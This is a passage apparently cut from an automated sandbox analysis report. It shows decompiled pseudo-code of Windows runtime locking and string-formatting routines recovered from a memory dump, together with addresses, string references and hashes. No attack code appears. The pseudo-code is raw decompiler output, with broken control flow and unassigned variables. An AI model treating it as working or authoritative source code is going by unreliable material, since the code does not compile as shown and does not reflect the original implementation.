										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b701c0;
												_push(_t138);
												_push(0);
												_t58 = E00A8F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00AD4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00AE3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00AE3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00B1217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00AE3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00AD3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00AB5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00A8F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00AD3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00A8F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00AD3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00A8F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00AD3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00AB5329(_t110, _t138);
																return E00AB53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x00ad055a
0x00ad055d
0x00ad0563
0x00ad0566
0x00ad05d8
0x00ad05e2
0x00ad05e5
0x00000000
0x00ad05e7
0x00ad05e7
0x00ad05ea
0x00ad05f3
0x00ad05f3
0x00ad0568
0x00ad0568
0x00ad0568
0x00ad0569
0x00ad0569
0x00ad0569
0x00ad056b
0x00000000
0x00000000
0x00af217f
0x00af2183
0x00af225b
0x00af225f
0x00af2189
0x00af218c
0x00af218f
0x00af2194
0x00af2199
0x00af219d
0x00af21a0
0x00af21a2
0x00af21ce
0x00af21ce
0x00af21ce
0x00af21d0
0x00af21d6
0x00af21de
0x00af21e2
0x00af21e8
0x00af21e9
0x00af21ec
0x00af21f1
0x00af21f6
0x00000000
0x00000000
0x00af21f8
0x00af21fb
0x00af2206
0x00af220b
0x00af220c
0x00af2217
0x00af2226
0x00af222b
0x00af222c
0x00af222f
0x00af2232
0x00af2235
0x00af2235
0x00af223a
0x00af223f
0x00af2241
0x00af2243
0x00af2248
0x00af2248
0x00af224d
0x00af224f
0x00af2262
0x00af2263
0x00af2268
0x00af2269
0x00af2269
0x00af2269
0x00af226d
0x00000000
0x00000000
0x00af2276
0x00af2279
0x00af227e
0x00af2283
0x00af2287
0x00af228a
0x00af228d
0x00af228f
0x00af22bc
0x00af22bc
0x00af22bc
0x00af22be
0x00af22c4
0x00af22cc
0x00af22d0
0x00af22d6
0x00af22d7
0x00af22da
0x00af22df
0x00af22e4
0x00000000
0x00000000
0x00af22e6
0x00af22e9
0x00af22f4
0x00af22f9
0x00af22fa
0x00af2305
0x00af2314
0x00af2319
0x00af231a
0x00af231d
0x00af2320
0x00af2323
0x00af2323
0x00af2328
0x00af232d
0x00af232f
0x00af2331
0x00af2336
0x00af2336
0x00af233b
0x00af233d
0x00af2350
0x00af2351
0x00af2356
0x00af2359
0x00af2359
0x00af235b
0x00af235d
0x00ab5367
0x00ab536b
0x00ab5372
0x00000000
0x00000000
0x00000000
0x00000000
0x00af2363
0x00af2363
0x00af2369
0x00af236a
0x00af236c
0x00af2371
0x00af2373
0x00000000
0x00af2379
0x00af2379
0x00af237a
0x00af237f
0x00af237f
0x00af2385
0x00af2386
0x00af2389
0x00af238e
0x00af2390
0x00ab5378
0x00ab537c
0x00af2396
0x00af2396
0x00af2397
0x00af239c
0x00af23a2
0x00af23a3
0x00af23a6
0x00af23ab
0x00af23ad
0x00000000
0x00af23b3
0x00af23b3
0x00af23b4
0x00af23b9
0x00af23ba
0x00af23ba
0x00af23bc
0x00af23bf
0x00000000
0x00000000
0x00ae9153
0x00ae9158
0x00ae915a
0x00ae915e
0x00ae9160
0x00000000
0x00ae9166
0x00ae9166
0x00ae9171
0x00ae9176
0x00ae9176
0x00000000
0x00ae9160
0x00af23c6
0x00af23d7
0x00af23d7
0x00af23ad
0x00af2390
0x00af2373
0x00af233f
0x00af233f
0x00000000
0x00af233f
0x00af2291
0x00af2291
0x00af2293
0x00af2295
0x00af229a
0x00af22a1
0x00af22a3
0x00af22a7
0x00af22a9
0x00000000
0x00000000
0x00af22ab
0x00af22ad
0x00af22af
0x00000000
0x00000000
0x00000000
0x00af22af
0x00af22b1
0x00af22b4
0x00af22b4
0x00af22b6
0x00ab53be
0x00ab53be
0x00ab53be
0x00ab53c0
0x00000000
0x00000000
0x00ab53cb
0x00ab53ce
0x00ab53d0
0x00ab53d4
0x00ab53d6
0x00000000
0x00ab53d8
0x00ab53e3
0x00ab53ea
0x00ab53ea
0x00000000
0x00ab53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00af22b6
0x00000000
0x00af228f
0x00af2349
0x00af234d
0x00af2251
0x00af2251
0x00000000
0x00af2251
0x00af21a4
0x00af21a4
0x00af21a6
0x00af21a8
0x00af21ac
0x00af21b6
0x00af21b8
0x00af21bc
0x00af21be
0x00000000
0x00000000
0x00af21c0
0x00af21c2
0x00af21c4
0x00000000
0x00000000
0x00000000
0x00af21c4
0x00af21c6
0x00af21c6
0x00af21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00af21c8
0x00af21a2
0x00000000
0x00af2183
0x00ad057b
0x00ad057d
0x00ad0581
0x00ad0583
0x00af2178
0x00000000
0x00ad0589
0x00ad058f
0x00ad058f
0x00ad0583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF2206

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AF22FC
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00AF220E
RTL: Re-Waiting, xrefs: 00AF223A, 00AF2328
RTL: Resource at %p, xrefs: 00AF221D, 00AF230B

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 3ec43cd313f5ea90dd84a8204071e69fa0e223610f7f33fa4eaacde822dc4bc1
Instruction ID: f89bb168b73f8f71d7174dc67c4b90296179cf8e094259e946654f41a3dbd64c
Opcode Fuzzy Hash: 3ec43cd313f5ea90dd84a8204071e69fa0e223610f7f33fa4eaacde822dc4bc1
Instruction Fuzzy Hash: AF512B727002056FDF14CB59CC81FB633A9AF98710F218269FE59DF285DA71EC418794

Uniqueness

Uniqueness Score: -1.00%

Function 00AD14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00AD14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xb72088; // 0x777eda1d
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00AC7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00AD13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00AC7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00AC7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A92340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A9E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x00ad14c0
0x00ad14cb
0x00ad14d2
0x00ad14d6
0x00ad14da
0x00ad14de
0x00ad14e3
0x00ad157a
0x00ad157a
0x00ad14f1
0x00ad14f3
0x00afea0f
0x00000000
0x00afea15
0x00000000
0x00afea15
0x00ad14f9
0x00ad14f9
0x00ad14fe
0x00ad1504
0x00afea1a
0x00afea1f
0x00afea21
0x00afea22
0x00afea27
0x00afea2a
0x00afea2a
0x00ad1515
0x00ad1517
0x00ad156d
0x00ad1572
0x00ad1575
0x00ad1575
0x00ad151e
0x00afea50
0x00afea55
0x00afea58
0x00afea58
0x00ad152e
0x00ad1531
0x00ad1533
0x00000000
0x00ad1535
0x00ad1541
0x00ad1549
0x00ad1549
0x00ad1533
0x00ad14f3
0x00ad1559

APIs

___swprintf_l.LIBCMT ref: 00AFEA22

Part of subcall function 00AD13CB: ___swprintf_l.LIBCMT ref: 00AD146B
Part of subcall function 00AD13CB: ___swprintf_l.LIBCMT ref: 00AD1490

___swprintf_l.LIBCMT ref: 00AD156D

Strings

]:%u, xrefs: 00AFEA47
%%%u, xrefs: 00AD1564

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 9e554ad090064d07cbae9548f5001f6616bf3d60bcec0da39ec003d9d06d9e06
Instruction ID: 52245cb2697849116c7b7105d5258c927a55211533dad7c08a6bff19bce6b901
Opcode Fuzzy Hash: 9e554ad090064d07cbae9548f5001f6616bf3d60bcec0da39ec003d9d06d9e06
Instruction Fuzzy Hash: 1F21B172A00219BBCF20DF68DD41AEF73BCBB50700F444516F946D3241DB799A588BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00AB53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b701c0;
									_push(_t92);
									_push(0);
									_t37 = E00A8F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00AD4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00AE3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00AE3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00B1217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00AE3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00AD3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00AB5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00A8F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00AD3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00A8F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00AD3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00A8F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00AD3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00AB5329(_t74, _t92);
													_push(1);
													return E00AB53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x00ab53ab
0x00ab53ae
0x00ab53b1
0x00ab53b4
0x00ab53b7
0x00ad05b6
0x00ad05c0
0x00ad05c3
0x00000000
0x00ad05c9
0x00ad05c9
0x00ad05cc
0x00ad05d5
0x00ad05d5
0x00ab53bd
0x00ab53bd
0x00ab53bd
0x00ab53be
0x00ab53be
0x00ab53be
0x00ab53c0
0x00000000
0x00000000
0x00af2269
0x00af226d
0x00af2349
0x00af234d
0x00af2273
0x00af2276
0x00af2279
0x00af227e
0x00af2283
0x00af2287
0x00af228a
0x00af228d
0x00af228f
0x00af22bc
0x00af22bc
0x00af22bc
0x00af22be
0x00af22c4
0x00af22cc
0x00af22d0
0x00af22d6
0x00af22d7
0x00af22da
0x00af22df
0x00af22e4
0x00000000
0x00000000
0x00af22e6
0x00af22e9
0x00af22f4
0x00af22f9
0x00af22fa
0x00af2305
0x00af2314
0x00af2319
0x00af231a
0x00af231d
0x00af2320
0x00af2323
0x00af2323
0x00af2328
0x00af232d
0x00af232f
0x00af2331
0x00af2336
0x00af2336
0x00af233b
0x00af233d
0x00af2350
0x00af2351
0x00af2356
0x00af2359
0x00af2359
0x00af235b
0x00af235d
0x00ab5367
0x00ab536b
0x00ab5372
0x00000000
0x00000000
0x00000000
0x00000000
0x00af2363
0x00af2363
0x00af2369
0x00af236a
0x00af236c
0x00af2371
0x00af2373
0x00000000
0x00af2379
0x00af2379
0x00af237a
0x00af237f
0x00af237f
0x00af2385
0x00af2386
0x00af2389
0x00af238e
0x00af2390
0x00ab5378
0x00ab537c
0x00af2396
0x00af2396
0x00af2397
0x00af239c
0x00af23a2
0x00af23a3
0x00af23a6
0x00af23ab
0x00af23ad
0x00000000
0x00af23b3
0x00af23b3
0x00af23b4
0x00af23b9
0x00af23ba
0x00af23ba
0x00af23bc
0x00af23bf
0x00000000
0x00000000
0x00ae9153
0x00ae9158
0x00ae915a
0x00ae915e
0x00ae9160
0x00000000
0x00ae9166
0x00ae9166
0x00ae9171
0x00ae9176
0x00ae9176
0x00000000
0x00ae9160
0x00af23c6
0x00af23cb
0x00af23d7
0x00af23d7
0x00af23ad
0x00af2390
0x00af2373
0x00af233f
0x00af233f
0x00000000
0x00af233f
0x00af2291
0x00af2291
0x00af2293
0x00af2295
0x00af229a
0x00af22a1
0x00af22a3
0x00af22a7
0x00af22a9
0x00000000
0x00000000
0x00af22ab
0x00af22ad
0x00af22af
0x00000000
0x00000000
0x00000000
0x00af22af
0x00af22b1
0x00af22b4
0x00af22b4
0x00af22b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00af22b6
0x00af228f
0x00000000
0x00af226d
0x00ab53cb
0x00ab53ce
0x00ab53d0
0x00ab53d4
0x00ab53d6
0x00000000
0x00ab53d8
0x00ab53e3
0x00ab53ea
0x00ab53ea
0x00ab53d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF22F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AF22FC
RTL: Re-Waiting, xrefs: 00AF2328
RTL: Resource at %p, xrefs: 00AF230B

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: b0b9cd6cc165c2ee08e8a49b7af78c61d54ec469860afd4f9771e73e4251eee3
Instruction ID: 1c64a6399c67a7217dba766b7077c61cc6a21142cb9af6a39e831fdd07d6d841
Opcode Fuzzy Hash: b0b9cd6cc165c2ee08e8a49b7af78c61d54ec469860afd4f9771e73e4251eee3
Instruction Fuzzy Hash: EB51F6726006056BDF119B79CD91FE673ECAF58364F104229FE19DF282EA61ED418790

Uniqueness

Uniqueness Score: -1.00%

Function 00ABEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00ABEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00AADA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xb7793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A916C0(_t39);
				} else {
					_t40 = E00A8F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00AD3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A901A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xb7793c; // 0x0
								_push(_t85);
								_t44 = E00A91F28(_t71);
							} else {
								_t44 = E00A8F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00AD3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00B12306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00ABEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00AD4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00AE3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00AE3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
